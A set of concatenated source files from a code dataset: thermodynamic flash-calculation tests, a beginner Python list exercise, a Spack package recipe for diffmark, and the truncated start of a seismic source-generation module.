HeatCapacityGas(poly_fit=(50.0, 1000.0, [2.3511458696647882e-21, -9.223721411371584e-18, 1.3574178156001128e-14, -8.311274917169928e-12, 4.601738891380102e-10, 1.78316202142183e-06, -0.0007052056417063217, 0.13263597297874355, 28.44324970462924]))]
VolumeLiquids = [VolumeLiquid(poly_fit=(178.51, 498.1, [6.564241965071999e-23, -1.6568522275506375e-19, 1.800261692081815e-16, -1.0988731296761538e-13, 4.118691518070104e-11, -9.701938804617744e-09, 1.4022905458596618e-06, -0.00011362923883050033, 0.0040109650220160956])),
VolumeLiquid(poly_fit=(209.63, 509.5799999999999, [2.034047306563089e-23, -5.45567626310959e-20, 6.331811062990084e-17, -4.149759318710192e-14, 1.6788970104955462e-11, -4.291900093120011e-09, 6.769385838271721e-07, -6.0166473220815445e-05, 0.0023740769479069054])),
VolumeLiquid(poly_fit=(175.7, 502.5, [3.5725079384600736e-23, -9.031033742820083e-20, 9.819637959370411e-17, -5.993173551565636e-14, 2.2442465416964825e-11, -5.27776114586072e-09, 7.610461006178106e-07, -6.148574498547711e-05, 0.00216398089328537])),]
VaporPressures = [VaporPressure(exp_poly_fit=(178.51, 508.09000000000003, [-1.3233111115238975e-19, 4.2217134794609376e-16, -5.861832547132719e-13, 4.6488594950801467e-10, -2.3199079844570237e-07, 7.548290741523459e-05, -0.015966705328994194, 2.093003523977292, -125.39006100979816])),
VaporPressure(exp_poly_fit=(207.15, 536.4, [-8.714046553871422e-20, 2.910491615051279e-16, -4.2588796020294357e-13, 3.580003116042944e-10, -1.902612144361103e-07, 6.614096470077095e-05, -0.01494801055978542, 2.079082613726621, -130.24643185169472])),
VaporPressure(exp_poly_fit=(175.7, 512.49, [-1.446088049406911e-19, 4.565038519454878e-16, -6.278051259204248e-13, 4.935674274379539e-10, -2.443464113936029e-07, 7.893819658700523e-05, -0.016615779444332356, 2.1842496316772264, -134.19766175812708]))]
liquid = GibbsExcessLiquid(VaporPressures=VaporPressures, VolumeLiquids=VolumeLiquids,
HeatCapacityGases=HeatCapacityGases, use_Poynting=True,
use_phis_sat=False)
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True, HeatCapacityGases=HeatCapacityGases,
VolumeLiquids=VolumeLiquids, VaporPressures=VaporPressures)
T, P = 350.0, 1e6
zs = [0.2, 0.0, 0.8]
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas':constants.omegas}
gas = IdealGas(HeatCapacityGases=HeatCapacityGases, T=T, P=P, zs=zs)
flashN = FlashVLN(constants, correlations, liquids=[liquid], gas=gas)
# Low - all K values below 1
res = flashN.flash(T=T, P=P, zs=zs)
assert_close(res.rho_mass(), 733.1047159397776)
assert 1 == res.phase_count
assert res.liquid0 is not None
# High - all K values above 1
res = flashN.flash(T=430, P=1e4, zs=zs)
assert 1 == res.phase_count
assert res.gas is not None
assert_close(res.rho_mass(), 0.10418751067559757)
# One K value is under 1, rest are above - but that component has mole frac of zero
res = flashN.flash(T=420, P=1e4, zs=zs)
assert 1 == res.phase_count
assert res.gas is not None
# phis_sat for liquids was broken, breaking this calculation
res = flashN.flash(T=285.5, P=1e4, zs=zs)
assert_close1d(res.betas, [0.21860038882559643, 0.7813996111744036])
assert res.phase_count == 2
# Two cases where RR was run with all Ks less than 1 and came up with a made-up VF
# Need to check the Ks first
res = flashN.flash(T=300.0000, P=900000.0000, zs=[0.5, 0.1, 0.4, 0.0],)
assert 1 == res.phase_count
assert res.gas is None
res = flashN.flash(T=300.0000, P=900000.0000, zs=[.5, 0, 0, .5])
assert 1 == res.phase_count
assert res.gas is None
def test_flash_combustion_products():
P = 1e5
T = 794.5305048838037
zs = [0.5939849621247668, 0.112781954982051, 0.0676691730155464, 0.2255639098776358]
constants = ChemicalConstantsPackage(atomss=[{'N': 2}, {'C': 1, 'O': 2}, {'O': 2}, {'H': 2, 'O': 1}], CASs=['7727-37-9', '124-38-9', '7782-44-7', '7732-18-5'], MWs=[28.0134, 44.0095, 31.9988, 18.01528], names=['nitrogen', 'carbon dioxide', 'oxygen', 'water'], omegas=[0.04, 0.2252, 0.021, 0.344], Pcs=[3394387.5, 7376460.0, 5042945.25, 22048320.0], Tbs=[77.355, 194.67, 90.18799999999999, 373.124], Tcs=[126.2, 304.2, 154.58, 647.14], Tms=[63.15, 216.65, 54.36, 273.15])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(poly_fit=(50.0, 1000.0, [-6.496329615255804e-23, 2.1505678500404716e-19, -2.2204849352453665e-16, 1.7454757436517406e-14, 9.796496485269412e-11, -4.7671178529502835e-08, 8.384926355629239e-06, -0.0005955479316119903, 29.114778709934264])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [-3.1115474168865828e-21, 1.39156078498805e-17, -2.5430881416264243e-14, 2.4175307893014295e-11, -1.2437314771044867e-08, 3.1251954264658904e-06, -0.00021220221928610925, 0.000884685506352987, 29.266811602924644])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [7.682842888382947e-22, -3.3797331490434755e-18, 6.036320672021355e-15, -5.560319277907492e-12, 2.7591871443240986e-09, -7.058034933954475e-07, 9.350023770249747e-05, -0.005794412013028436, 29.229215579932934])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [5.543665000518528e-22, -2.403756749600872e-18, 4.2166477594350336e-15, -3.7965208514613565e-12, 1.823547122838406e-09, -4.3747690853614695e-07, 5.437938301211039e-05, -0.003220061088723078, 33.32731489750759]))])
kijs = [[0.0, -0.0122, -0.0159, 0.0], [-0.0122, 0.0, 0.0, 0.0952], [-0.0159, 0.0, 0.0, 0.0], [0.0, 0.0952, 0.0, 0.0]]
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas, 'kijs': kijs}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
res = flasher.flash(T=T, P=P, zs=zs)
assert res.gas
assert res.phase == 'V'
def test_bubble_T_PR_VL():
# Last point at 8e6 Pa not yet found.
constants = ChemicalConstantsPackage(CASs=['124-38-9', '110-54-3'], MWs=[44.0095, 86.17536], names=['carbon dioxide', 'hexane'], omegas=[0.2252, 0.2975], Pcs=[7376460.0, 3025000.0], Tbs=[194.67, 341.87], Tcs=[304.2, 507.6], Tms=[216.65, 178.075])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(poly_fit=(50.0, 1000.0, [-3.1115474168865828e-21, 1.39156078498805e-17, -2.5430881416264243e-14, 2.4175307893014295e-11, -1.2437314771044867e-08, 3.1251954264658904e-06, -0.00021220221928610925, 0.000884685506352987, 29.266811602924644])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [1.3740654453881647e-21, -8.344496203280677e-18, 2.2354782954548568e-14, -3.4659555330048226e-11, 3.410703030634579e-08, -2.1693611029230923e-05, 0.008373280796376588, -1.356180511425385, 175.67091124888998]))])
zs = [.5, .5]
T = 300.0
P = 1e6
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
res = flasher.flash(P=7.93e6, VF=0, zs=zs)
assert_close(res.T, 419.0621213529388, rtol=1e-6)
def test_PR_four_bubble_dew_cases_VL():
zs=[.5, .5]
T=300.0
P=1E6
constants = ChemicalConstantsPackage(CASs=['98-01-1', '98-00-0'], MWs=[96.08406000000001, 98.09994], names=['2-furaldehyde', 'furfuryl alcohol'], omegas=[0.4522, 0.7340000000000001], Pcs=[5510000.0, 5350000.0], Tbs=[434.65, 441.15], Tcs=[670.0, 632.0], Tms=[235.9, 250.35])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(poly_fit=(298, 1000, [4.245751608816354e-21, -2.470461837781697e-17, 6.221823690784335e-14, -8.847967216702641e-11, 7.749899297737877e-08, -4.250059888737765e-05, 0.013882452355067994, -2.1404621487165327, 185.84988012691903])),
HeatCapacityGas(poly_fit=(250.35, 632.0, [-9.534610090167143e-20, 3.4583416772306854e-16, -5.304513883184021e-13, 4.410937690059558e-10, -2.0905505018557675e-07, 5.20661895325169e-05, -0.004134468659764938, -0.3746374641720497, 114.90130267531933]))])
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
assert_close(flasher.flash(P=1e6, VF=0, zs=zs).T, 539.1838522423529, rtol=1e-6)
assert_close(flasher.flash(P=1e6, VF=1, zs=zs).T, 540.2081697501809, rtol=1e-6)
assert_close(flasher.flash(T=600.0, VF=0, zs=zs).P, 2766476.7473238464, rtol=1e-6)
assert_close(flasher.flash(T=600.0, VF=1, zs=zs).P, 2702616.6490743402, rtol=1e-6)
def test_C1_C10_PT_flash_VL():
IDs = ['methane', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'C10']
zs=[.1]*10
T=300.0
P=1E5
constants = ChemicalConstantsPackage(CASs=['74-82-8', '74-84-0', '74-98-6', '106-97-8', '109-66-0', '110-54-3', '142-82-5', '111-65-9', '111-84-2', '124-18-5'], MWs=[16.04246, 30.06904, 44.09562, 58.1222, 72.14878, 86.17536, 100.20194000000001, 114.22852, 128.2551, 142.28168], names=['methane', 'ethane', 'propane', 'butane', 'pentane', 'hexane', 'heptane', 'octane', 'nonane', 'decane'], omegas=[0.008, 0.098, 0.152, 0.193, 0.251, 0.2975, 0.3457, 0.39399999999999996, 0.444, 0.49], Pcs=[4599000.0, 4872000.0, 4248000.0, 3796000.0, 3370000.0, 3025000.0, 2740000.0, 2490000.0, 2290000.0, 2110000.0], Tbs=[111.65, 184.55, 231.04, 272.65, 309.21, 341.87, 371.53, 398.77, 423.95, 447.25], Tcs=[190.56400000000002, 305.32, 369.83, 425.12, 469.7, 507.6, 540.2, 568.7, 594.6, 611.7], Tms=[90.75, 90.3, 85.5, 135.05, 143.15, 178.075, 182.15, 216.3, 219.9, 243.225])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(poly_fit=(50.0, 1000.0, [6.7703235945157e-22, -2.496905487234175e-18, 3.141019468969792e-15, -8.82689677472949e-13, -1.3709202525543862e-09, 1.232839237674241e-06, -0.0002832018460361874, 0.022944239587055416, 32.67333514157593])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [7.115386645067898e-21, -3.2034776773408394e-17, 5.957592282542187e-14, -5.91169369931607e-11, 3.391209091071677e-08, -1.158730780040934e-05, 0.002409311277400987, -0.18906638711444712, 37.94602410497228])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [7.008452174279456e-22, -1.7927920989992578e-18, 1.1218415948991092e-17, 4.23924157032547e-12, -5.279987063309569e-09, 2.5119646468572195e-06, -0.0004080663744697597, 0.1659704314379956, 26.107282495650367])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [-2.608494166540452e-21, 1.3127902917979555e-17, -2.7500977814441112e-14, 3.0563338307642794e-11, -1.866070373718589e-08, 5.4505831355984375e-06, -0.00024022110003950325, 0.04007078628096955, 55.70646822218319])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [7.537198394065234e-22, -4.946850205122326e-18, 1.4223747507170372e-14, -2.3451318313798008e-11, 2.4271676873997662e-08, -1.6055220805830093e-05, 0.006379734000450042, -1.0360272314628292, 141.84695243411866])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [1.3740654453881647e-21, -8.344496203280677e-18, 2.2354782954548568e-14, -3.4659555330048226e-11, 3.410703030634579e-08, -2.1693611029230923e-05, 0.008373280796376588, -1.356180511425385, 175.67091124888998])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [-1.4046935863496273e-21, 5.8024177500786575e-18, -7.977871529098155e-15, 7.331444047402207e-13, 9.954400606484495e-09, -1.2112107913343475e-05, 0.0062964696142858104, -1.0843106737278825, 173.87692850911935])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [-1.069661592422583e-22, -1.2992882995593864e-18, 8.808066659263286e-15, -2.1690080247294972e-11, 2.8519221306107026e-08, -2.187775092823544e-05, 0.009432620102532702, -1.5719488702446165, 217.60587499269303])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [6.513870466670624e-22, -5.318305817618858e-18, 1.8015815307749625e-14, -3.370046452151828e-11, 3.840755097595374e-08, -2.7203677889897072e-05, 0.011224516822410626, -1.842793858054514, 247.3628627781443])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [-1.702672546011891e-21, 6.6751002084997075e-18, -7.624102919104147e-15, -4.071140876082743e-12, 1.863822577724324e-08, -1.9741705032236747e-05, 0.009781408958916831, -1.6762677829939379, 252.8975930305735]))])
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
res = flasher.flash(T=T, P=P, zs=zs)
assert_close(res.VF, 0.3933480634014041, rtol=1e-5)
def test_combustion_products():
from chemicals.combustion import fuel_air_spec_solver
IDs = ['methane', 'carbon dioxide', 'ethane', 'propane',
'isobutane', 'butane', '2-methylbutane', 'pentane',
'hexane', 'nitrogen', 'oxygen', 'water']
T = C2K(15)
P = 1e5
zs_fuel = [0.9652228316853225, 0.0059558310220860665, 0.018185509193506685, 0.004595963476244076,
0.0009769695915451998, 0.001006970610302194, 0.000472984762445398, 0.0003239924667435125,
0.0006639799746946288, 0.002594967217109564, 0.0, 0.0]
zs_fuel = normalize(zs_fuel)
zs_air = [0.0]*9 + [0.79, 0.21] + [0.0]
constants, properties = ChemicalConstantsPackage.from_IDs(IDs)
combustion = fuel_air_spec_solver(zs_air=zs_air, zs_fuel=zs_fuel, CASs=constants.CASs,
atomss=constants.atomss, n_fuel=1.0, O2_excess=0.1)
zs = combustion['zs_out']
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, T=T, P=P, zs=zs, HeatCapacityGases=properties.HeatCapacityGases)
liquid = CEOSLiquid(PRMIX, eos_kwargs, T=T, P=P, zs=zs, HeatCapacityGases=properties.HeatCapacityGases)
flasher = FlashVL(constants, properties, liquid=liquid, gas=gas)
res = flasher.flash(T=400.0, P=1e5, zs=zs)
assert res.phase_count == 1
assert res.gas is not None
def test_furfuryl_alcohol_high_TP():
# Legacy bug, don't even remember what the original issue was
constants = ChemicalConstantsPackage(MWs=[98.09994, 18.01528], Tcs=[632.0, 647.14], Pcs=[5350000.0, 22048320.0], omegas=[0.734, 0.344], names=['furfuryl alcohol', 'water'], CASs=['98-00-0', '7732-18-5'])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(load_data=False, poly_fit=(250.35, 632.0, [-9.534610090167143e-20, 3.4583416772306854e-16, -5.304513883184021e-13, 4.410937690059558e-10, -2.0905505018557675e-07, 5.20661895325169e-05, -0.004134468659764938, -0.3746374641720497, 114.90130267531933])),
HeatCapacityGas(load_data=False, poly_fit=(50.0, 1000.0, [5.543665000518528e-22, -2.403756749600872e-18, 4.2166477594350336e-15, -3.7965208514613565e-12, 1.823547122838406e-09, -4.3747690853614695e-07, 5.437938301211039e-05, -0.003220061088723078, 33.32731489750759]))])
eos_kwargs = dict(Tcs=constants.Tcs, Pcs=constants.Pcs, omegas=constants.omegas)
zs = [0.4444445555555555, 1-0.4444445555555555]
T, P = 5774.577777777778, 220483199.99999997
gas = CEOSGas(eos_class=PRMIX, eos_kwargs=eos_kwargs, T=T, P=P, zs=zs, HeatCapacityGases=correlations.HeatCapacityGases)
liquid = CEOSLiquid(eos_class=PRMIX, eos_kwargs=eos_kwargs, T=T, P=P, zs=zs, HeatCapacityGases=correlations.HeatCapacityGases)
flasher = FlashVL(constants, correlations, liquid=liquid, gas=gas)
assert_close(flasher.flash(T=T, P=P, zs=zs).rho_mass(), 227.52709151903954)
def test_flash_GibbsExcessLiquid_ideal_Psat():
# Binary water-ethanol
T = 230.0
P = 1e5
zs = [.4, .6]
MWs = [18.01528, 46.06844]
Tcs = [647.086, 514.7]
Pcs = [22048320.0, 6137000.0]
omegas = [0.344, 0.635]
VaporPressures = [VaporPressure(extrapolation='DIPPR101_ABC|DIPPR101_ABC', exp_poly_fit=(273.17, 647.086, [-2.8478502840358144e-21, 1.7295186670575222e-17, -4.034229148562168e-14, 5.0588958391215855e-11, -3.861625996277003e-08, 1.886271475957639e-05, -0.005928371869421494, 1.1494956887882308, -96.74302379151317])),
VaporPressure(extrapolation='DIPPR101_ABC|DIPPR101_ABC', exp_poly_fit=(159.11, 514.7, [-2.3617526481119e-19, 7.318686894378096e-16, -9.835941684445551e-13, 7.518263303343784e-10, -3.598426432676194e-07, 0.00011171481063640762, -0.022458952185007635, 2.802615041941912, -166.43524219017118]))]
HeatCapacityGases = [HeatCapacityGas(poly_fit=(50.0, 1000.0, [5.543665000518528e-22, -2.403756749600872e-18, 4.2166477594350336e-15, -3.7965208514613565e-12, 1.823547122838406e-09, -4.3747690853614695e-07, 5.437938301211039e-05, -0.003220061088723078, 33.32731489750759])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [-1.162767978165682e-20, 5.4975285700787494e-17, -1.0861242757337942e-13, 1.1582703354362728e-10, -7.160627710867427e-08, 2.5392014654765875e-05, -0.004732593693568646, 0.5072291035198603, 20.037826650765965]))]
VolumeLiquids = [VolumeLiquid(poly_fit=(273.17, 637.096, [9.00307261049824e-24, -3.097008950027417e-20, 4.608271228765265e-17, -3.8726692841874345e-14, 2.0099220218891486e-11, -6.596204729785676e-09, 1.3368112879131157e-06, -0.00015298762503607717, 0.007589247005014652]),
Psat=VaporPressures[0], Tc=Tcs[0], Pc=Pcs[0], omega=omegas[0]),
VolumeLiquid(poly_fit=(159.11, 504.71000000000004, [5.388587987308587e-23, -1.331077476340645e-19, 1.4083880805283782e-16, -8.327187308842775e-14, 3.006387047487587e-11, -6.781931902982022e-09, 9.331209920256822e-07, -7.153268618320437e-05, 0.0023871634205665524]),
Psat=VaporPressures[1], Tc=Tcs[1], Pc=Pcs[1], omega=omegas[1])]
EnthalpyVaporizations = [EnthalpyVaporization(Tc=647.14, poly_fit_ln_tau=(273.17, 647.095, 647.14, [0.010220675607316746, 0.5442323619614213, 11.013674729940819, 110.72478547661254, 591.3170172192005, 1716.4863395285283, 4063.5975524922624, 17960.502354189244, 53916.28280689388])),
EnthalpyVaporization(Tc=514.0, poly_fit_ln_tau=(159.11, 513.9999486, 514.0, [-0.002197958699297133, -0.1583773493009195, -4.716256555877727, -74.79765793302774, -675.8449382004112, -3387.5058752252276, -7531.327682252346, 5111.75264050548, 50774.16034043739]))]
constants = ChemicalConstantsPackage(Tcs=Tcs, Pcs=Pcs, omegas=omegas, MWs=MWs, CASs=['7732-18-5', '64-17-5'])
correlations = PropertyCorrelationsPackage(constants, HeatCapacityGases=HeatCapacityGases, EnthalpyVaporizations=EnthalpyVaporizations,
VolumeLiquids=VolumeLiquids, VaporPressures=VaporPressures, skip_missing=True)
liquid = GibbsExcessLiquid(VaporPressures=VaporPressures,
HeatCapacityGases=HeatCapacityGases,
VolumeLiquids=VolumeLiquids,
EnthalpyVaporizations=EnthalpyVaporizations,
caloric_basis='Psat', equilibrium_basis='Psat',
T=T, P=P, zs=zs)
gas = IdealGas(T=T, P=P, zs=zs, HeatCapacityGases=HeatCapacityGases)
flasher = FlashVL(constants, correlations, liquid=liquid, gas=gas)
# All points were missing because G_dep was missing
res = flasher.flash(T=300, P=1e5, zs=zs)
assert res.liquid_count == 1
# Failing when two K values were under 1e-10
res = flasher.flash(T=100, P=1e5, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
# Wilson guesses are hard zeros
res = flasher.flash(T=5, P=1e5, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
# Wilson guesses inf, nan, and all zero
res = flasher.flash(T=6.2, P=5e4, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
# One (but not both) fugacity became zero
res = flasher.flash(T=8.4, P=1e-5, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
# Vapor fraction flashes
for VF_value in (0.0, 1e-5, .3, .5, .7, 1-1e-5, 1.0):
VF = flasher.flash(T=T, VF=VF_value, zs=zs)
check = flasher.flash(T=T, P=VF.P, zs=zs)
assert_close(VF.VF, check.VF, rtol=1e-9)
# Not exactly sure where the numerical challenge is occurring, but this is to be expected.
# The tolerance decays at very small numbers
for VF_value in (1e-7, 1e-8, 1-1e-7, 1-1e-8):
VF = flasher.flash(T=T, VF=VF_value, zs=zs)
check = flasher.flash(T=T, P=VF.P, zs=zs)
assert_close(VF.VF, check.VF, rtol=1e-5)
def test_flash_GibbsExcessLiquid_ideal_PsatPoynting():
# Binary water-ethanol
T = 230.0
P = 1e5
zs = [.4, .6]
MWs = [18.01528, 46.06844]
Tcs = [647.086, 514.7]
Pcs = [22048320.0, 6137000.0]
omegas = [0.344, 0.635]
VaporPressures = [VaporPressure(exp_poly_fit=(273.17, 647.086, [-2.8478502840358144e-21, 1.7295186670575222e-17, -4.034229148562168e-14, 5.0588958391215855e-11, -3.861625996277003e-08, 1.886271475957639e-05, -0.005928371869421494, 1.1494956887882308, -96.74302379151317])),
VaporPressure(exp_poly_fit=(159.11, 514.7, [-2.3617526481119e-19, 7.318686894378096e-16, -9.835941684445551e-13, 7.518263303343784e-10, -3.598426432676194e-07, 0.00011171481063640762, -0.022458952185007635, 2.802615041941912, -166.43524219017118]))]
HeatCapacityGases = [HeatCapacityGas(poly_fit=(50.0, 1000.0, [5.543665000518528e-22, -2.403756749600872e-18, 4.2166477594350336e-15, -3.7965208514613565e-12, 1.823547122838406e-09, -4.3747690853614695e-07, 5.437938301211039e-05, -0.003220061088723078, 33.32731489750759])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [-1.162767978165682e-20, 5.4975285700787494e-17, -1.0861242757337942e-13, 1.1582703354362728e-10, -7.160627710867427e-08, 2.5392014654765875e-05, -0.004732593693568646, 0.5072291035198603, 20.037826650765965]))]
VolumeLiquids = [VolumeLiquid(poly_fit=(273.17, 637.096, [9.00307261049824e-24, -3.097008950027417e-20, 4.608271228765265e-17, -3.8726692841874345e-14, 2.0099220218891486e-11, -6.596204729785676e-09, 1.3368112879131157e-06, -0.00015298762503607717, 0.007589247005014652]),
Psat=VaporPressures[0], Tc=Tcs[0], Pc=Pcs[0], omega=omegas[0]),
VolumeLiquid(poly_fit=(159.11, 504.71000000000004, [5.388587987308587e-23, -1.331077476340645e-19, 1.4083880805283782e-16, -8.327187308842775e-14, 3.006387047487587e-11, -6.781931902982022e-09, 9.331209920256822e-07, -7.153268618320437e-05, 0.0023871634205665524]),
Psat=VaporPressures[1], Tc=Tcs[1], Pc=Pcs[1], omega=omegas[1])]
EnthalpyVaporizations = [EnthalpyVaporization(Tc=647.14, poly_fit_ln_tau=(273.17, 647.095, 647.14, [0.010220675607316746, 0.5442323619614213, 11.013674729940819, 110.72478547661254, 591.3170172192005, 1716.4863395285283, 4063.5975524922624, 17960.502354189244, 53916.28280689388])),
EnthalpyVaporization(Tc=514.0, poly_fit_ln_tau=(159.11, 513.9999486, 514.0, [-0.002197958699297133, -0.1583773493009195, -4.716256555877727, -74.79765793302774, -675.8449382004112, -3387.5058752252276, -7531.327682252346, 5111.75264050548, 50774.16034043739]))]
constants = ChemicalConstantsPackage(Tcs=Tcs, Pcs=Pcs, omegas=omegas, MWs=MWs, CASs=['7732-18-5', '64-17-5'])
correlations = PropertyCorrelationsPackage(constants, HeatCapacityGases=HeatCapacityGases, EnthalpyVaporizations=EnthalpyVaporizations,
VolumeLiquids=VolumeLiquids, VaporPressures=VaporPressures, skip_missing=True)
eoss = [PR(Tc=Tcs[0], Pc=Pcs[0], omega=omegas[0], T=T, P=P),
PR(Tc=Tcs[1], Pc=Pcs[1], omega=omegas[1], T=T, P=P)]
liquid = GibbsExcessLiquid(VaporPressures=VaporPressures,
HeatCapacityGases=HeatCapacityGases,
VolumeLiquids=VolumeLiquids,
EnthalpyVaporizations=EnthalpyVaporizations,
caloric_basis='PhiSat', equilibrium_basis='PhiSat',
eos_pure_instances=eoss,
T=T, P=P, zs=zs)
gas = IdealGas(T=T, P=P, zs=zs, HeatCapacityGases=HeatCapacityGases)
flasher = FlashVL(constants, correlations, liquid=liquid, gas=gas)
# This was failing in PyPy for a while but not in CPython
res = flasher.flash(T=15, P=1e5, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
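
# --- Pattern note (editorial addition, not part of the original test module) ---
# Every test above follows the same construction: build a ChemicalConstantsPackage
# and a PropertyCorrelationsPackage, create the phase objects (CEOSGas/CEOSLiquid,
# or GibbsExcessLiquid/IdealGas) with matching T, P, zs, wrap them in
# FlashVL(constants, correlations, liquid=..., gas=...), and then call
# flasher.flash(...) with two state variables (T/P/VF) plus the composition zs.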
| 1.140625 | 1 |
ex38.py | YunMeMeThaw/python_exercises | 0 | 6833 | <reponame>YunMeMeThaw/python_exercises<gh_stars>0
ten_things = "Apples Oranges cows Telephone Light Sugar"
print ("Wait there are not 10 things in that list. Let's fix")
stuff = ten_things.split(' ')
more_stuff = {"Day", "Night", "Song", "Firebee",
"Corn", "Banana", "Girl", "Boy"}
while len(stuff) !=10:
next_one = more_stuff.pop()
print("Adding: ", next_one)
stuff.append(next_one)
print (f"There are {len(stuff)} items n ow.")
print ("There we go : ", stuff)
print ("Let's do some things with stuff.")
print (stuff[1])
print (stuff[-1]) # whoa! cool!
print (stuff.pop())
print (' '.join(stuff)) # what? cool !
print ('#'.join(stuff[3:5])) # super stellar!
| 3.890625 | 4 |
var/spack/repos/builtin/packages/diffmark/package.py | player1537-forks/spack | 11 | 6834 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Diffmark(AutotoolsPackage):
"""Diffmark is a DSL for transforming one string to another."""
homepage = "https://github.com/vbar/diffmark"
git = "https://github.com/vbar/diffmark.git"
version('master', branch='master')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('pkgconfig', type='build')
depends_on('libxml2')
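
# --- Usage note (editorial addition, not part of the original recipe) ---
# With this recipe available to a Spack instance, the package would be
# installed with something like:  spack install diffmark@master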
| 1.5625 | 2 |
bbp/comps/irikura_gen_srf.py | ZhangHCFJEA/bbp | 28 | 6835 | #!/usr/bin/env python
"""
Copyright 2010-2019 University Of Southern California
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import division, print_function
# Import Python modules
import os
import sys
import math
import shutil
# Import Broadband modules
import plot_srf
import bband_utils
from irikura_gen_srf_cfg import IrikuraGenSrfCfg
from install_cfg import InstallCfg
class IrikuraGenSrf(object):
"""
Implements Arben's gen_srf.csh script in Python
"""
def __init__(self, i_r_velmodel, i_r_srcfile,
o_r_srffile, i_vmodel_name, sim_id=0,
**kwargs):
self.sim_id = sim_id
self.r_velmodel = i_r_velmodel
self.r_srcfile = i_r_srcfile
self.r_srffile = o_r_srffile
self.vmodel_name = i_vmodel_name
self.r_srcfiles = []
# Get all src files that were passed to us
if kwargs is not None and len(kwargs) > 0:
for idx in range(len(kwargs)):
self.r_srcfiles.append(kwargs['src%d' % (idx)])
else:
# Not a multisegment run, just use the single src file
self.r_srcfiles.append(i_r_srcfile)
def run(self):
"""
This function prepares the parameters for Irikura's gen_srf then calls it
"""
print("IrikuraGenSrf".center(80, '-'))
# Load configuration, set sim_id
install = InstallCfg.getInstance()
sim_id = self.sim_id
# Build directory paths
a_tmpdir = os.path.join(install.A_TMP_DATA_DIR, str(sim_id))
a_indir = os.path.join(install.A_IN_DATA_DIR, str(sim_id))
a_outdir = os.path.join(install.A_OUT_DATA_DIR, str(sim_id))
a_logdir = os.path.join(install.A_OUT_LOG_DIR, str(sim_id))
a_param_outdir = os.path.join(a_outdir, "param_files")
# Make sure the output and tmp directories exist
bband_utils.mkdirs([a_tmpdir, a_indir, a_outdir,
a_logdir, a_param_outdir])
# Now, file paths
self.log = os.path.join(a_logdir, "%d.gen_srf.log" % (sim_id))
a_srcfiles = [os.path.join(a_indir,
